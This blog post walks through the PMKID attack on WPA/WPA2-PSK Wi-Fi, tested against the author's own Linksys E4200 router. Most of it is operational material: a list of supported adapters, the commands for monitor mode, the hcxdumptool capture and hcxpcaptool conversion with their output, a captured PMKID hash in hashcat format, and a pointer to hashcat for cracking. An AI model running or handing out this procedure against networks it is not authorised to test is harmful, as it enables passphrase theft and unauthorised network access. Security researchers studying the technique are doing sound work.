New attack on WPA/WPA2 using PMKID

In this short blog, I will walk you through the process of obtaining a valid PMKID packet, and converting those frames of data to hashcat format for cracking. This is a new way to recover the WPA2-PSK passphrases from vulnerable devices, that doesn’t require station <->client interaction or a 4-way handshake.

Checklist:

Linux — Debian

# uname -ar

Linux ubuntu 4.13.0-46-generic #51-Ubuntu SMP Tue Jun 12 12:36:29 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Supported adapters (strict)

USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter

USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter

USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter

USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Out of all the cards mentioned, in my preliminary testing I found the older AWUS036H card I bought in 2012 to work the best.

AWUS036H

Both Alfa USB devices work well. Preliminary results show better performance, with the AWUS036H . I was able to obtain multiple PKMID frames within seconds sometimes from a vulnerable access point . The older Alfa AWUS036H is a also a more powerful card and works better with nosier conditions.

root@ubuntu:~# lsusb

--- snip ---

Bus 003 Device 016: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter



--- snip ---

Vulnerable Linksys E4200 router with WPA2-PSK authentication enabled

Seven year old home router from 2011

Wireless Settings

Walk-through:

# ip link set wlx00c0ca59f4b2 down # iw dev wlx00c0ca59f4b2 set type monitor # rfkill unblock all # ip link set wlx00c0ca59f4b2 up ./hcxdumptool -i wlx00c0ca694df2 --enable_status -c 6 -o E4200-WPA2PSK.pcapng --

[15:18:14 - 006] c0c1c04bfc68 -> e4209b5662d3 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 3605]

[15:18:16 - 006] c0c1c04bfc68 -> fcc2330136c6 [FOUND PMKID]

-- # ./hcxpcaptool -z E4200-WPA2PSK.16800 E4200-WPA2PSK.pcapng

start reading from E4200-WPA2PSK.pcapng



summary:

--------

file name....................: E4200-WPA2PSK.pcapng

file type....................: pcapng 1.0

file hardware information....: x86_64

file os information..........: Linux 4.13.0-46-generic

file application information.: hcxdumptool 4.2.0

network type.................: DLT_IEEE802_11_RADIO (127)

endianess....................: little endian

file os information..........: Linux 4.13.0-46-generic

file application information.: hcxdumptool 4.2.0

network type.................: DLT_IEEE802_11_RADIO (127)

endianess....................: little endian

read errors..................: flawless

packets inside...............: 129

skipped packets..............: 0

packets with FCS.............: 67

beacons (with ESSID inside)..: 2

probe requests...............: 2

probe responses..............: 4

association requests.........: 13

association responses........: 26

authentications (OPEN SYSTEM): 70

authentications (BROADCOM)...: 14

EAPOL packets................: 12

EAPOL PMKIDs.................: 1

best handshakes..............: 1 (ap-less: 0) 1 PMKID(s) written to E4200-WPA2PSK.16800

# cat E4200-WPA2PSK.16800

b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934

Details to be noted:

Ensure you specify the correct channel when passing that value to “-c” to the Access Point you are targeting.

4. Hashchat

We can download the newly updated https://hashcat.net/hashcat/ V4.2.0 which cracks two new hash types:

WPA-PMKID-PBKDF2

WPA-PMKID-PMK

The files have been copied to a windows host and “cracked” below for illustration purposes only. Since it’s a single hex encoded string, it’s much easier to copy and mange between different hosts.